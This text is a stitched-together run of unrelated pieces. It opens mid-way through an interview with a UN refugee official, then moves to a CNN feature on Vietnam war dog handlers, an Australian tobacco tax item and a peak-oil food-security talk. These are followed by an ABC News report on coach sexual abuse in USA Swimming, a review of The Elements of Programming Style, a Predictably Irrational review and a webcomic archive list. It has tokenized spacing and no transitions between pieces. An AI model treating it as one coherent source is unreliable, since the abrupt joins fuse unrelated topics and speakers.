You have Central African Republicans that go to Cameroon to kill , hijack , and rob .
FP : Many have cited improvements in the related conflicts in Darfur and Eastern Chad in recent months .
Do you see that ?
AG : It ’s still too early to fully [ say ] , but there are recent developments that represent a potential change for the better .
First , Chad and Sudan have made an agreement that ’s apparently more solid than past agreements [ which have fallen apart ] .
They ’ve agreed to fully normalize relations and establish common patrol forces along the border area .
It ’s clear that there wo n’t be any support for the other country ’s rebels , especially because the key rebel element in the Darfur situation that had been supported by Chad , the Justice and Equality Movement , has also made an agreement with Khartoum .
Some might argue that the key problem in Sudan is now the North - South relationship , because there will be a referendum [ on southern independence in 2011 ] , and the possible creation of a new state [ South Sudan ] .
There might be a genuine interest in Khartoum to have a more manageable situation in Darfur .
FP : Is your agency preparing any contingencies for the April elections in Sudan ?
AG : Everyone should contribute [ to a peaceful elections environment ] so that things take place in a harmonious way .
But of course it ’s important to be prepared for whatever might occur .
So today this is one of our key concerns .
And for us , Southern Sudan has regained priority for our operations in Sudan .
FP : Let ’s move to the situation of Iraqi refugees and their slow return home .
Are things progressing ?
AG : There have been some returns from Syria and Jordan to Iraq .
But we ’ve been witnessing a trend for a core of people to remain [ outside Iraq ] .
Our two key challenges now are : first , the preservation of asylum space and protection space in the surrounding countries , and second , to improve the functionality of the government ’s support to returning people from inside and outside Iraq .
We now have a presence in 14 districts in Iraq , but there is no way the international community or civil society can replace the need to have a functioning state to deal with these problems .
FP : How about the situation in Afghanistan , given recent U.S. operations there ?
AG : In Afghanistan , the key problem is still the security problem .
We have control over only half the territory of the country .
The number of returns to Afghanistan has dramatically decreased because obviously the conditions are not met for the easy reintegration of people .
There ’s been some new displacement because of military operations taking place .
[ Because of the security situation , ] we have reduced the footprint of the international presence by 30 to 40 percent both in Pakistan and Afghanistan .
We had three staff members killed in Pakistan last year , so that ’s been a major concern for us .
But we have to go on .
If you look at the questions you ’ve asked , they identify what we could call an " arc of crisis " from South Asia — Afghanistan , Pakistan — going into Iraq , the Middle East — and then back to Sudan and Chad .
We could also easily mention the Horn of Africa : Somalia , Yemen .
This is an " arc of crises " from which two - thirds of the world ’s refugees originate .
All these crises are becoming more and more interrelated .
You see the links between Somalia and Yemen .
If you look at Iraq , there ’s a clear connection between Iraq and what ’s happening the Middle East .
The Palestinian question is invoked by many in the whole region .
FP : If you compare today ’s situation to that of 2005 , when you became high commissioner , what ’s the biggest difference ?
AG : Conflicts are not getting better .
Conflicts are getting more worrisome and more difficult to solve .
For example , the number of people we helped to return last year decreased dramatically .
The three biggest countries where return operations are taking place face complex security challenges : Afghanistan , Southern Sudan , and DRC .
Conflicts are n’t getting better , the number of refugees and internally displaced people are n’t decreasing .
That ’s one point .
The second point is that in general the human rights agendas are losing ground to the national sovereignty agendas .
That has many important implications .
The third — and I do n’t want to look too pessimistic — is that we ’re witnessing new trends of forced displacement .
A refugee in the traditional vision is someone who flees from country to another because of persecution or conflict .
But what we ’re witnessing now more and more is a certain number of mega - trends interacting with one another : population growth , urbanization , food insecurity , water scarcity , climate change , and conflict .
More and more people are on the move for reasons that are sometimes difficult to differentiate .
If a Somali crosses the Gulf of Aden , is it because of the conflict or because [ there are no ] jobs ?
Probably both .
Climate change [ also ] enhances conflict .
If resources become scarce , people tend to fight for them .
This is increasing the number of people on the move and the number of people forced to move .
They ’re not refugees , according to the legal definition , but they represent a major humanitarian and human rights challenge , as well as a major challenge for world politics .
( CNN ) -- Maybe it was the sound of the wind cutting through the wire .
Perhaps he caught a small vibration with his keen eyes .
Or it could have been a slight difference in the air 's smell .
Whatever it was , when Sarge noticed that his Marine Corps handler , Fred Dorr , was creeping down the wrong path in the Vietnam jungle , the German shepherd did something he'd never done out in the field :
He looked at Dorr and barked , before taking a seat .
" When he sat down , I knew there was a trip wire .
I was one step away from it , " remembered Dorr , who with his dog in 1969 was " walking point , " leading the way for a dozen soldiers .
Had the hidden explosive device been tripped , " It would have gotten half of us . "
More than 40 years later , the gratitude and love Dorr , 59 , feels for the dog he served with is as strong as ever .
And it's for this reason that Dorr , president of the Vietnam Dog Handler Association , drove from his Yoakum , Texas , home to be in Southern California this week .
About 200 Vietnam
War dog handlers , who were trained to read and communicate with their canine partners , have gathered for a reunion .
And on Saturday they 'll join an expected several thousand others for the 10th anniversary rededication of the War Dog Memorial at the March Air Reserve Base in Riverside .
During the Vietnam War , more than 4,000 dogs served in various positions , said Michael Lemish , a military dog historian and author of " Forever Forward : K - 9 Operations in Vietnam . "
The scout dogs , such as Sarge , walked with their handlers ahead of patrols -- making them the first target for ambushes or hidden explosives .
There were also sentry dogs who guarded bases , tracker dogs who followed the trail of enemies and mine and booby trap dogs who sniffed out dangers hidden beneath the ground .
The Viet Cong placed a bounty on the dogs because they were so effective , Lemish said .
All told , he estimated the K - 9 teams averted more than 10,000 casualties .
But at the end of the war , only about 200 dogs came home .
The rest who had survived were either euthanized or turned over to the South Vietnamese -- left behind , a surplus of war .
" They were treated as obsolete equipment .
And if you were a handler , you could n't see them that way , " said Jack Kowall , 61 , who keeps a framed picture of himself and Eric , the black lab and shepherd mix he worked with , atop his desk in Marietta , Georgia .
" When that 's your dog , that 's your dog .
He sees you in danger , he 's going to respond .
Unconditional love -- it 's all for you .
You can't help but love him . "
On patrols , Kowall used hand motions to speak to Eric .
In turn , the animal spoke back through his movements .
His ears would shoot up and turn in the direction of suspicious noise .
The hair on his back would stand up if danger was close .
If he wanted Kowall to stop moving , he 'd look back at him .
Off - duty , Eric was playful .
He liked to have his neck scratched and would roll around on the ground .
The 110 - pound dog would cuddle up to Kowall at night when they were out in the field , and he'd eat out of his handler 's helmet .
Whenever Kowall could , he 'd give his closest friend steak .
The men who'd walk behind the pair on missions were always different .
But a scout handler and his dog were a constant , as the duo bounced between different assignments .
When Jeffrey Bennett , founder and former CEO of Nature 's Recipe pet foods , first learned about the dogs who'd served and the fate of so many of them , he set out to teach others .
Based on about three years of research , he co-produced the documentary " War Dogs : America 's Forgotten Heroes , " which first aired 11 years ago on the Discovery Channel .
Donations earned through this film allowed Bennett , now president of the War Dog Memorial , to commission three monuments , sculptures featuring a German shepherd and his handler .
The first one was unveiled at the March Field Air Museum in Riverside .
A second was installed at Fort Benning , Georgia .
The third remains in storage , Bennett said .
The original goal to place it in Washington beside the Vietnam Veterans Memorial or at Arlington National Cemetery in Virginia remains an elusive dream .
Dogs have long served with the U.S. military , said Lemish , who also wrote " War Dogs : A History of Loyalty and Heroism . "
During World War I , the dogs borrowed from the French and British worked as messengers and assisted the Red Cross by finding the wounded on battlefields , he said .
The American K - 9 corps , Lemish said , really began during World War II , when , among other tasks , thousands of dogs donated by civilians patrolled shorelines .
Back then , dogs sent abroad were retrained and returned to civilian life , but that practice had changed by the time U.S. forces entered Vietnam , Lemish said .
Later , galvanized by the attention earned through the documentary , Vietnam War dog handlers began to call for change .
Johnny Mayo , 60 , had n't spoken to another dog handler in 30 years when he showed up in Washington for his first reunion in 2000 .
But as he talked to the 250 others in attendance , he realized the power of what they shared .
" You go through the war , and you always remember the bond you have , the bond with the dog , " said Mayo , whose dog Kelly once yanked him up a bank from a rice paddy , out of the way of mortar fire .
" On that first trip to the [ Vietnam Veterans Memorial ] wall , it was a reunion with the spirits of our dogs . "
Later , Mayo , of Lexington , South Carolina , would go on to write his own book and establish a traveling exhibit to pay tribute to the dogs who'd served .
Washington also took notice .
In November 2000 , President Clinton signed into law legislation that established a military working dog adoption program .
Now the dogs working in Iraq and Afghanistan will have a chance to find comfortable homes when they return from war .
For Dorr , of the Vietnam Dog Handler Association , this has been a blessing .
He said leaving his partner Sarge behind , all those decades ago , haunted him .
" A lot of us [ handlers ] suffered PTSD , " he said , referring to post - traumatic stress disorder .
" It 's like leaving your kid back there . "
But he now has Bluma , the war dog he adopted from Lackland Air Force Base in San Antonio , Texas .
The German shepherd , who has hip problems , looks uncannily like Sarge , he said , and having him around is a source of comfort .
" I 'm taking care of an old vet , " Dorr said , " and he 's taking care of me . "
THE price of cigarettes is set for a hefty rise , with the federal government today announcing an increase in excise .
And all cigarettes will have to be sold in plain packets by the start of 2012 under a radical government plan to remove one of the remaining forms of tobacco advertising .
How the generic pack of cigarettes will look .
The excise increase will be sold as a health measure but will also help the budget 's bottom line , which has to pay for promises made by Prime Minister Kevin Rudd to get his hospital reform deal with the states .
The current excise is about 25 ¢ a cigarette .
The increase is part of the response to the Henry taxation review that will be released on Sunday .
My presentation has 4 parts .
First , I will connect what is going on in the economy right now with natural resources and the environment .
Second , I will explain why oil is an especially important resource and what is meant by peak oil .
Third , I will discuss the implications of economic decline and peak oil for the food system .
And fourth , I will suggest what families and society can do given our predicament .
The following is the prepared text for a talk I gave in the city hall of Eugene Oregon the evening of Feb. 17 , 2010 .
It was organized by two Lane County commissioners and the city mayor and is part of a series on Food Security .
My role was to discuss food security in the context of peak oil .
This speech is similar to one I gave last year that was also posted on The Oil Drum .
At the end I recommended people look up The Post Carbon Institute and affiliates for good leads on what ideas and actions are happening in response to our predicament .
The Economy and Mother Nature
I want you all to imagine Mother Nature , in the personified sense .
Now , and I realize this may be a stretch , think of her also as a banker , perhaps a matronly Ben Bernanke .
Got that image in your head ?
Okay …
Several generations ago our forefathers walk into “ Bank of Nature ” and get a loan .
Mother Nature approves our loan and offers us plenty of credit .
Our ancestors are now endowed with the riches of ancient forests , prolific fisheries , fertile topsoil , clean water , concentrated mineral ores , vast reserves of fossil fuels , and a splendidly stable climate .
These assets , Mother Nature ’s credit slip , are the source of our wealth and comfort .
Every widget , gizmo , thing - a- majig , do - dad , wach - a - macall - it and Winnebago produced in our factories , sold in our stores , stuffed in our closets , piled in our landfills and spilled in our waters originated as a loan from Bank of Nature .
Why are we having economic troubles ?
Because loans , as we are now discovering , are not just slips of credit , they also come with debt .
While we gleefully liquidated the Natural Capital loan Mother Nature approved for us , we failed to develop a business plan that could pay back the debt .
This ecological debt is the underlying drag on our financial system .
What this means , practically , is that as soon as the economy tries to heat up again , which we like to call increasing DEMAND , it will be capped on the knees by the henchmen Mother Nature hired .
She will not extend us any more credit since we have done a poor job with the first loan .
If you are unclear about what I mean here , I ’ll explain this a bit more when I talk specifically about oil .
I have seen pictures of some great protest signs over the past couple of years that state this very succinctly : Nature does n’t do bailouts .
This is why the current policy of all central banks and governments to deal with the financial crisis , which is to essentially create and inject more money into the system , has no chance of success .
More money does n’t solve an ecological debt crisis , because money is a claim on resources and not worth anything by itself .
Oil is Special
Okay , now I want to highlight the special role of oil in our economy .
Over the recent decades , we have built what is called a “ globalized economy ” where materials , labor and services are readily exchanged across the globe .
This feat has only been possible due to cheap oil .
The “ cheapness ” is key .
Transportation costs are assumed to be only a small part of doing business .
Some economists have calculated what is called the Goldilocks Zone for oil prices .
Below $ 70 per barrel and it makes no sense for oil companies to explore and develop new supplies , while prices above $ 80 per barrel lead to a curtailing of demand , basically cutting off prospects for U.S. economic growth .
And as mature oil fields deplete , the price to explore and develop new oil wells goes higher than $ 70 per barrel , essentially locking the U.S. into economic stagnation .
Step back for a moment and think about how potent and special oil is .
Oil is highly energy dense and easily portable .
A gallon of oil contains enough energy to do the work of hundreds of people simultaneously or a single person for hundreds of hours .
You can drive a 4000 lb car at great velocity for tens of miles on a gallon of gasoline .
Try pushing a car that distance ( but before doing so , ask your doctor if that ’s okay ) .
So when you hear the term peak oil , what does that mean ?
Peak oil is simply the point in time when the global supply of oil stops growing .
Peak oil is not a theory , but an historic fact for 2/3 of oil producing countries , including the United States , which peaked in 1970 .
What we experience is less supply leading to a spike in prices .
High oil prices then choke off economic growth because our globalized economy is structurally reliant on cheap oil .
And without economic growth loans are not paid back sufficiently and a financial crisis ensues .
This is essentially what happened between 2005 and 2008 .
We had a credit bubble because of lax lending policies PLUS a flattening of oil production at the same time .
Connecting to Food Security
Okay , so what does this have to do with food security ?
Globalization and cheap energy led to the development of centralized processing and distribution channels , with what is termed “ just in time delivery systems . ”
The typical grocery store , for example , only has a 3 day supply of food on the shelves , and relies on daily trucking from distance warehouses to restock basic supplies .
An oil supply shock would disrupt getting food to stores .
Because of cheap and reliable transportation , it has been possible for entire agricultural regions to become highly specialized in production for export .
So the Willamette Valley evolved into a grass seed capital , which replaced a diversified farm economy that contributed significantly to local consumption .
Since we no longer have the local farms feeding us , we depend on global trade for basic sustenance .
Farming methods themselves rely on cheap energy , such as tractor fuel and imported fertilizers .
Beyond the farm energy is used extensively in processing , distribution , storage and cooking .
All told , about 7 calories of fossil fuel go into each calorie of food we eat .
Modern farming is highly connected to the financial system .
A depressed economy makes credit scare .
Many farms that are in debt and require bank credit to operate will likely go out of business .
And some financing is going to be needed to help farms restructure for the transition towards new crops , new methods , and new markets .
What to Do
This brings me to the question of “ What to do ? ”
I ’ll first address this towards individual persons and families .
As energy flows to society decline , our social systems will become less complex structurally , but our daily lives more complex .
What I mean by this is that we will become less of “ specialized cogs in a big machine ” and instead have to take on more diverse , practical , and flexible roles .
The kinds of work we do will shift too .
Consider whether you specialize in a “ nice to have job ” or a “ need to have job ” .
Jobs are going to be more and more about securing basic needs , such as food , water , shelter , health , and security .
Fewer paid jobs will be available .
This will require people to rely more on the informal economy , which means getting paid through reciprocal exchange relationships .
Start by getting to know your neighbors , joining social networks , and developing a few basic skills , such as gardening , bike repair , and inexpensive health care .
As our formal economy declines more work will be done in the informal economy , as is true now in so - called developing countries .
Graph from Post Peak Living based on World Bank data .
This all may sound extreme , but it is already the reality for a growing subpopulation of tens of millions of Americans , and most of the 6.7 billion humans on the planet .
Now I ’ll talk about what I ’d like to see society do .
Instead of thinking about policies and programs , I will talk about values and paradigms .
Primarily we need to recognize that the environment is our primary form of wealth .
Bank of Nature , not Goldman Sachs or the Federal Reserve , is our master .
It is far more important for us to pay back our ecological debts since these are non-negotiable , whereas financial ones are among people and can be forgiven .
If you manage public funds , always ask whether allocating money is going to rebuild natural capital or further its liquidation .
I ’d like to see community leaders ask people to consider themselves as contributors rather than consumers .
The whole consumer identity should become passé .
We will thrive by creating an ecological identity , which is a deep appreciation for our relatedness and absolute interdependence with other people , other forms of life on this planet , and the fundamental forces of sunshine and geology .
What I have said may provoke anxiety , and is certainly an immense undertaking , but ultimately we have no choice so let ’s not whine and delay .
Let ’s take it on as a great adventure , a thrilling challenge .
Our success or failure is going to hinge on our attitude .
We need to take control of the circumstances and become active participants in transition .
I can assure you that doing so is tremendously energizing , healthy , and rewarding in so many ways .
Apr. 9 , 2010  --
In a sex abuse scandal that some victims compare to what happened in the Catholic Church , at least 36 swimming coaches have been banned for life by the USA Swimming organization over the last 10 years because of sexual misconduct .
The coaches have molested , fondled and abused dozens of swimmers , according to court records and interviews conducted by ABC News for reports Friday on " World News with Diane Sawyer " and " 20/20 . "
WATCH PART 1 of the 20/20 investigation .
WATCH PART 2 of the 20/20 investigation .
One coach , Brian Hindson of Kokomo , IN , secretly taped teenage girls he coached in two high school pool locker rooms , one in which he directed girls to a " special " shower room where he had a hidden camera inside a locker .
" It was a sense of betrayal , " Indiana swimming star Brooke Taflinger told ABC News chief investigative correspondent Brian Ross for a report to be broadcast Friday on " 20/20 . "
Taflinger 's parents later identified Brooke for the FBI as one of the girls who was taped naked in the locker and shower area .
" I gotta tell you , it hurt , " Brooke 's father , Bruce Taflinger , told " 20/20 . "
" My wife only had to look at one picture before she turned away in tears , " he said .
FBI agents became aware of the pictures after a North Carolina woman bought the coach 's computer on E - Bay and discovered a video clip of a young girl in a locker room appearing to be taped without her knowledge .
A subsequent search of Hindson 's home turned up more locker room footage and a large selection of child pornography .
" This had gone on for nearly 10 years , without any detection whatsoever , " Lt. Don Whitehead of the Kokomo , IN police department 's cyber crime unit told ABC News .
Hindson was sentenced in 2008 to 33 years in federal prison .
His attorney Gregg Stark did not return repeated requests for comment .
Still , another one of Hindson 's victims , Sarah Rutkowski , now 21 , said there are many questions left unanswered .
" I 'd really like to know how he did it and where the videos have ended up , if they 're on the internet or if he put them through Limewire or if they were just sitting around for his personal use , " Rutkowski , who is believed to have been 12 or 13 when she was taped , told ABC News .
" That 's really disturbing to me , not knowing where those videos are . "
CONTACT THE ABC NEWS INVESTIGATIVE TEAM IF YOU HAVE A STORY TO ADD TO THIS INVESTIGATION .
USA Swimming
Hindson is one of the 36 coaches banned for life for sexual misconduct over the last 10 years by USA Swimming , the governing body for the sport up to and including the U.S. Olympic team .
Ken Stopkotte , named Indiana High School Boys Swimming and Diving State Coach of the year for 2009 , said the problem is pervasive and has been going on his entire 27 years in coaching .
" It 's something that coaches talk about all the time , " Stopkotte told ABC News .
The executive director of USA Swimming , Chuck Wielgus , acknowledged the problem , but said " It 's " It 's not nearly as serious in USA Swimming as it might be in the rest of society . "
" I do n't want to be the one to sit here and say 36 is not too many , one is too many , but this is not just a problem that 's isolated to one sport , " said Wielgus .
In some cases , the swimming coaches found to have been sexual predators were able to move from town to town , one step ahead of police and angry victims and their parents .
" We have a system that does not encourage the reporting , " said Bob Allard , a San Jose , CA lawyer representing sex abuse victims suing USA Swimming .
A San Jose swimming coach , Andy King , 62 , was sentenced to 40 years in prison in January after authorities discovered a pattern of sexual abuse that stretched over three decades up and down the West Coast and involved more than a dozen teen female victims .
" He was a monster , " said Santa Clara County prosecutor Ray Mendoza .
" He had almost every conceivable sex act , " he said .
Mendoza said King would move out of town once parents or police began asking questions and was stopped only after a 14 - year old girl in San Jose complained to her youth pastor .
King previously worked as a swim coach in the San Francisco Bay area and in Oak Harbor , WA , where he was regarded as an excellent coach for aspiring Olympic team swimmers .
" He may have been a good coach , but his goal with these girls ultimately was to molest them , " said prosecutor Mendoza .
King 's lawyer , Jamie Harley , said some of the responsibility belongs to the swimmers ' parents whose ambition for their children blinded them to the problem .
" I think Mr. King bears enormous responsibility here , But I think the parents were not minding the store , " she said .
" I think had they been minding the store – had they been watching what 's going on with their own children this opportunity never could have presented itself . "
CONTACT THE ABC NEWS INVESTIGATIVE TEAM IF YOU HAVE A STORY TO ADD TO THIS INVESTIGATION .
Background Checks for Swimming Coaches
In 2008 , USA Swimming gave King a clean bill of health , saying his background screening had been approved .
" Congratulations , " read the letter .
" Your background screening has been thoroughly reviewed and meets the qualification standards set by USA Swimming . "
According to USA Swimming , the organization only checks for criminal convictions and does not include background interviews or investigations with local police .
" It was willfully incomplete , " said Bob Allard , a lawyer for families now suing USA Swimming .
" A simple phone call to Oak Harbor , his prior stop , or to the East Bay would have revealed much about this man 's propensity to abuse and molest kids . "
Police later documented at least 15 victims among the teenage girl swimmers he coached over the years , including a woman who said she had an abortion after King got her pregnant at the age of 14 .
" We want to have the gold standard and I think we do an awesome job , " said USA Swimming executive director Chuck Wielgus .
" I do n't think we 're perfect .
Wielgus says the local swim clubs , not the national organization , bear the responsibility to check the full backgrounds of swimming coaches they hire .
He said the 36 coaches banned by the organization over the last ten years were only a tiny fraction of the organization 's 12,000 coaches in that time period .
" Thirty six does seem like a whole lot .
A hundred is even more .
Five hundred is even more , " he told correspondent Brian Ross .
Asked if he had apologized to any of the young teen victims , Wielgus responded , " You feel I need to apologize to them ? "
He added , " I think it 's unfair for you to ask me whether individually or me as the representative of an organization to apologize for something when all we are trying to do is everything we possibly can to create a safe and healthy environment for kids who are participating in our particular activity . "
CONTACT THE ABC NEWS INVESTIGATIVE TEAM IF YOU HAVE A STORY TO ADD TO THIS INVESTIGATION .
Click Here for the Blotter Homepage .
I said in the first part of this series that one of the books I wanted to talk about was written in 1974 .
My colleague Dennis Schafroth guessed that it might be Kerninghan and Ritchie ’s classic , The C Programming Language , but the first edition of that book actually came out in 1978 .
But I awarded half a point anyway , because the book I had in mind ( A ) was co-written by Brian W. “ Water buffalo ” Kernighan , and ( B ) had a second edition in 1978 , the same year as K&R .
It is Kernighan and Plauger ’s The Elements of Programming Style ( amazon.com , amazon.co.uk )
( This is n’t a cover image from Amazon , it ’s a scan of my personal copy , because I wanted you to see how well - thumbed it is . )
What can a book from 1974 possibly have to teach us 36 years later ?
Especially when all its example code is in FORTRAN (! ) and PL /1 (!! ) ?
A lot , as it turns out .
For one thing , it contains ( on page 10 ) perhaps the single wisest thing that has ever been said about programming :
“ Everyone knows that debugging is twice as hard as writing a program in the first place .
So if you ’re as clever as you can be when you write it , how will you ever debug it ? ”
It ’s a short book : at only 168 smallish pages , it ’s less than a fifth as long as the bloated 938 - page tome I have about XSLT , and about one third as long as Fowler et al . ’s Refactoring , which is perhaps its spiritual heir .
It ’s arranged as eight chapters : Introduction , Expressions , Control Structure , Program Structure , Input and Output , Common Blunders , Efficiency and Instrumentation , and Documentation ; each chapter demonstrates ten or so rules ( which I will list below ) .
So far , so didactic : anyone can guess from this that EoPS is a useful book ; what ’s not so obvious is that it ’s very funny .
I ’ll let K&P explain their approach ( from the preface to the First Edition on page xi ) :
This book is a study of a large number of “ real ” programs , each of which provides one or more lessons in style .
We discuss the shortcomings of each example , rewrite it in a better way , then draw a general rule from the specific case . [ … ] all of the programs we use are taken from programming textbooks .
Thus we do not set up artificial problems to illustrate our points — we use finished products , written and published by experienced programmers .
This in itself is pretty hilarious : EoPS consists entirely of the mistakes made by people confident enough to publish their own programs as examples of good style .
What lifts it to the realm of laugh - out - loudfulness is the very dry style : K&P graciously abstain from going to town on the deficiencies of the programs they study , but their minutely detailed dissections speak volumes , and seem ( unless I am imagining it ) to convey an undertone of profound disdain .
For example , consider these observations on a program to calculate the area under a curve :
“ With all the extraneous assignments removed , it is easier to see the underlying structure .
It is also easy to see that the indentations reflect little of what is going on .
But what is the purpose of the variable I ?
It is laboriously kept equal to J so that OUT can be called at the end of the last iteration .
Clearly I is not needed , for J could be used for the test .
But the test is not needed ; OUT could be called just after the inner DO loop has terminated .
But OUT need not be called at all , for its code could just as well appear in the one place it is invoked .
The structure simplifies remarkably . ”
As another example , check out this section on commenting :
In other sections , fairly significant programs like a maze solver are taken apart , subjected to dispassionate but merciless criticism , and put together again shorter , clearer , more correct and more functional than before .
In short , Kernighan and Plauger do n’t just explain how to program well , they show us how it ’s done .
I ’m not going to claim that the book has n’t aged .
As you can see from the extract above , the typography looks very primitive ( it was done on an early version of troff ) , and rules such as “ Avoid the Fortran arithmetic IF ” and “ Initialize constants with DATA statements or INITIAL attributes ; initialize variables with executable code ” just do n’t apply any more in the post - FORTRAN era .
Another rule , “ Write first in an easy - to - understand pseudo - language ; then translate into whatever language you have to use ” , is also not applicable now that languages like Python and Ruby can read and execute the equivalent of the old pseudo - code .
This in itself demonstrates the value of one of K&P ’s more enduring rules : “ Let the machine do the dirty work ” .
Yes indeed : translating pseudo - code into executable code should not be left to humans .
But most of the rules are timeless , and remain as true and important today in 2010 as they were in 1974 .
The first rule after the introduction remains one of my favourites : “ Say what you mean , simply and directly ” .
( You may not believe it , reading this blog , but I try to apply this to my prose writing as well as my programming . )
Others that we should all try to live by : “ Each module should do one thing well ” ; “ Let the data structure the program ” ; “ Make it right before you make it faster ” and “ Keep it right when you make it faster ” .
So I keep coming back to EoPS ( I am re-reading it as I write this ) because it ’s short , it ’s easy reading , it ’s funny , and much of its advice is timeless .
In a way , you could say its age is even a plus - point , because it makes it obvious which of the rules are of their time and which are fundamental — whereas , for example , everyone knows that Design Patterns contains a mix of genuine insight and mere patches for Java ’s lack of expressive power , but it ’s not yet clear which patterns fall into which categories .
Give it another twenty years , and we should be in a position to figure that out .
Appendix : “ summary of rules ” from EoPS
Abstracted from the appendix SUMMARY OF RULES in The Elements of Programming Style ( Second Edition ) by Brian W. Kernighan and P. J. Plauger , pub .
McGraw - Hill , ISBN 0-07-034207-5 .
This summary is designed to give a quick review of the points we covered in the book .
Remember as you read the rules that they were presented in connection with one or more examples — go back and reread the pertinent section if a rule does n’t call them to mind .
To paraphrase an observation in The Elements of Style , rules of programming style , like those of English , are sometimes broken , even by the best writers .
When a rule is broken , however , you will usually find in the program some compensating merit , attained at the cost of the violation .
Unless you ’re certain of doing as well , you will probably do best to follow the rules .
Introduction
Write clearly — do n’t be too clever .
Expressions
Say what you mean , simply and directly .
Use library functions .
Avoid temporary variables .
Write clearly — do n’t sacrifice clarity for “ efficiency ” .
Let the machine do the dirty work .
Replace repetitive expressions by calls to a common function .
Parenthesize to avoid ambiguity .
Choose variable names that wo n’t be confused .
Avoid the Fortran arithmetic IF .
Avoid unnecessary branches .
Use the good features of a language ; avoid the bad ones .
Do n’t use conditional branches as a substitute for a logical expression .
Use the “ telephone test ” for readability .
Control Structure
Use DO -END and indenting to delimit groups of statements .
Use IF - ELSE to emphasize that only one of two actions is to be performed .
Use DO and DO - WHILE to emphasize the presence of loops .
Make your programs read from top to bottom .
Use IF … ELSE IF … ELSE IF … ELSE … to implement multi-way branches .
Use the fundamental control flow structures .
Write first in an easy - to - understand pseudo - language ; then translate into whatever language you have to use .
Avoid THEN -IF and null ELSE .
Avoid ELSE GOTO and ELSE RETURN .
Follow each decision as closely as possible with its associated action .
Use data arrays to avoid repetitive control sequences .
Choose a data representation that makes your program simple .
Do n’t stop with your first draft .
Program Structure
Modularize .
Use subroutines .
Make the coupling between modules visible .
Each module should do one thing well .
Make sure every module hides something .
Let the data structure the program .
Do n’t patch bad code — rewrite it .
Write and test a big program in small pieces .
Use recursive procedures for recursively - defined data structures .
Input and Output
Test input for validity and plausibility .
Make sure input cannot violate the limits of your program .
Terminate input by end - of - file or marker , not by count .
Identify bad input ; recover if possible .
Treat end of file conditions in a uniform manner .
Make input easy to prepare and output self - explanatory .
Use uniform input formats .
Make input easy to proofread .
Use free - form input when possible .
Use self - identifying input .
Allow defaults .
Echo both on output .
Localize input and output in subroutines .
Common Blunders
Make sure all variables are initialized before use .
Do n’t stop at one bug .
Use debugging compilers .
Initialize constants with DATA statements or INITIAL attributes ; initialize variables with executable code .
Watch out for off - by - one errors .
Take care to branch the right way on equality .
Avoid multiple exits from loops .
Make sure your code “ does nothing ” gracefully .
Test programs at their boundary values .
Program defensively .
10.0 times 0.1 is hardly ever 1.0
Do n’t compare floating point numbers just for equality .
Efficiency and Instrumentation
Make it right before you make it faster .
Keep it right when you make it faster .
Make it clear before you make it faster .
Do n’t sacrifice clarity for small gains in “ efficiency ” .
Let your compiler do the simple optimizations .
Do n’t strain to re-use code ; reorganize instead .
Make sure special cases are truly special .
Keep it simple to make it faster .
Do n’t diddle code to make it faster — find a better algorithm .
Instrument your programs .
Measure before making “ efficiency ” changes .
Documentation
Make sure comments and code agree .
Do n’t just echo the code with comments — make every comment count .
Do n’t comment bad code — rewrite it .
Use variable names that mean something .
Use statement labels that mean something .
Format a program to help the reader understand it .
Indent to show the logical structure of your program .
Document your data layouts .
Do n’t over - comment .
Over the weekend , I finally picked up and read Dan Ariely 's Predictably Irrational : The Hidden Forces That Shape Our Decisions , an accessible intro to the subject of behavioral economics — that is , the study of how people behave in the real world and why that varies from the predictions made by classical economic theory ( which predicts that people behave rationally and in their own interests ) .
This is a subject I 've been very interested in for some years and I 'd read and blogged a lot of material about Ariely 's work , but somehow never got 'round to reading it for myself .
I 'm very glad I did !
Ariely 's a very engaging writer and a smart social scientist with a knack for illustrating his hypotheses about human behavior through elegant and simple experiments .
There 's no better time than now to read Predictably Irrational , as Ariely 's theories about cheating , incentives , self - fulfilling prophecy , self control , and how we value the things we own versus the things we desire go a long way to explaining the econopocalypse , and also provide an excellent framework for analyzing proposals to get the economy moving again .
For example , Ariely describes a series of experiments that measure work performance among randomly selected groups of people where one group is paid nothing , one group is paid a little , and a third is paid a lot .
The group that was paid a little did a little .
The group that was paid a lot did a lot .
The group that was paid nothing did even more .
Ariely and colleagues go on to refine this experiment by changing the reward to gifts ( chocolates ) instead of money , then to gifts whose value is enumerated ( " you will receive a $ 5 box of Godiva chocolates " ) and examines how this effects performance .
He also examines what happens to performance in situations in which one is at first paid to work , then asked to do the same work again for free .
The results are fascinating , and point to the idea that we work hard for money , and we work hard for social reasons , but that one can short - circuit the other , and lastingly so .
He then goes on to explain how companies that ask their employees to work harder for social reasons ( " you 're part of the team " ) but dismiss the employees for economic reasons ( " we need to cut costs " ) end up in an impossible place .
So do companies that ask customers to come make a purchase as a social transaction ( " join the family ! " ) but then treat the transaction after the fact as a purely economic matter ( " you should have read the fine - print " ) .
Every chapter works in this vein , and taken as a whole , Predictably Irrational presents a fatal blow to the idea that we can run a system on the assumption that people will take courses of action based on rational calculus , unclouded by cognitive blind - spots that make it practically impossible to find the best course of action .
Of course , this is already an accepted reality of the business - world — it's why , for example , companies worry that an overly discounted price will reset consumer sentiment about the value of their product .
It 's why advertisers run " lifestyle " ads that do n't feature the product or enumerate its benefits .
It 's why there are introductory offers that increase in price thereafter .
All of these are designed to appeal to emotion , not rational calculus .
But in economics , this irrationality is treated like quantum physics : sure , it 's true that this happens on the subatomic scale , but the whole system behaves in a rational , Newtonian fashion and can be treated as such .
As Ariely persuasively argues , the economic world is full of a lot more weird , irrational quantum effects than we assume .
Predictably Irrational , Revised and Expanded Edition : The Hidden Forces That Shape Our Decisions
Comic Archives , yo 152 .
The Warning 151 . Blowing Bubbles The Chosen One , Part 10 The Chosen One , Part 9 The Chosen One , Part 8 The Chosen One , Part 7 The Chosen One , Part 6 The Chosen One , Part 5 The Chosen One , Part 4 The Chosen One , Part 3 The Chosen One , Part 2 ‘ The Chosen One ’ , part one Cobber ’s Christmas Video Game Comix 150 .
Validation 149 . Guest Comic by Christopher Baldwin Intermission : The Joys of Spring 148 .
Blood Baubles 147 . No Like 146 .
The Exercist Intermission : Rhyme Scene Investigation 145 . Bad Blood 144 . Reel Gone 143 . Billions & Billions 142 . A Change of Scene 141 . Misfortune Cookie 140 . Scratch and Snuff 139 .
The Call of the Mild 138 .
Reality Cheque 137 .
Some Assembly Required 136 .
Have You Heard the News Today 135 .
Flutter By 134 .
Duck !
133 . Yer Lyin ’! ( Brad Erkkila Guest Comic ) 132 .
You ’ve Grot Mail 131 .
A Holiday in the Sun 130 .
